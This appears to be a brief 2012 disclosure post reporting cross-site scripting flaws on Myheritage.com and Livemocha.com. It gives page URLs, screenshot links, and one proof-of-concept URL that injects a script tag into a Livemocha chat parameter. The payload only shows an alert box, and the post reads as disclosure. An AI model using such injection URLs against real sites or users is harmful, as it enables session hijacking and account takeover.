# Date: 11.03.2012
# Author: Sony
# Web Browser : Mozilla Firefox
# Blog: http://st2tea.blogspot.com
..................................................................

Social Networks.

5-10 minute with hands.

Intersting place for cross site scripting.

1. Myheritage.com

We have a multiple persistent cross site scripting  vulnerabilities.

I put only 2.

http://www.myheritage.com/site-183672172/styles?popup=4%2C+5547469671#notificationPanelAnchor

http://2.bp.blogspot.com/-s-nwU9rPqvU/T1zYNxFcRYI/AAAAAAAAAuQ/5MRuvBzrelY/s1600/meheritage1.JPG

http://www.myheritage.com/family-1_1000001_183672172_183672172/nepit-private-nepit-private-nepit-born-nedjoli

http://4.bp.blogspot.com/-mkS4ZvBayM0/T1zYUAbFsPI/AAAAAAAAAuc/-BfAQChoHwA/s1600/myheritage2.JPG

2. Livemocha.com

We can see xss after login page.

http://www.livemocha.com/userplane/frames?ext=html&is_src_user=true&strDestinationUserID=%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E&frameTarget=/userplane/wm

(it's chat link)

http://2.bp.blogspot.com/-x0_A6-iqYpM/T1zYoiup5PI/AAAAAAAAAuo/YPPqU-IjY5Q/s1600/livem.JPG